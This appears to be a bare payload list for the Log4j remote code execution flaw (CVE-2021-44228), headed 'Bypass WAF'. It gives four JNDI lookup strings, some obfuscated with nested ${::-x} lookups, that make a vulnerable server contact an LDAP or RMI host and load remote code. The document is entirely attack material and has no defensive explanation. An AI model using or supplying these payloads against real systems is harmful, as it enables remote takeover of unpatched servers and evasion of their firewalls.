Apache Log4j2 2.14.1 RCE (CVE-2021-44228)

Bypass WAF

1. ${jndi:ldap://127.0.0.1:1389/ badClassName}

2. ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}

3. ${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}

4. ${jndi:rmi://adsasd.asdasd.asdasd}